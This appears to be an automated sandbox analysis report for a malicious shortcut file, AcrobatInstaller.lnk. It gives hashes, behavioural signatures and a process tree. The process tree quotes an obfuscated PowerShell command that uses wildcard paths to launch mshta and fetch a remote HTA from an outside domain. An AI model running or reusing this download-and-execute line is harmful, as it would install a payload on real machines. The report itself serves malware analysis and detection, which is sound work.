Analysis
-
max time kernel
230s -
max time network
336s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
09-12-2022 08:13
Static task
static1
Behavioral task
behavioral1
Sample
AcrobatInstaller.lnk
Resource
win7-20221111-en
windows7-x64
4 signatures
150 seconds
General
-
Target
AcrobatInstaller.lnk
-
Size
1KB
-
MD5
efc13d85b551ba2d426d3754d642ca11
-
SHA1
43202b41ce4c2cd23cbba769227dce2f50750f27
-
SHA256
0cd9826b702404e2f9b6854c672409422f578afd63d43795e8e370b212d403d6
-
SHA512
3c09654c48cc9f32c240b153137750eb798cbdddc2fa7cca72ff4cac2a83563c90b9f66a13230b8af9903aa16b60b0e3a7b2bbb96ff4226cbae5962f410aff1e
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 392 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1476 wrote to memory of 392 1476 cmd.exe 29 PID 1476 wrote to memory of 392 1476 cmd.exe 29 PID 1476 wrote to memory of 392 1476 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AcrobatInstaller.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\?i*\S*3?\m*ta.e* ('https://cruds-club.com/AcrobatInstaller' + '.h' + 'ta')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-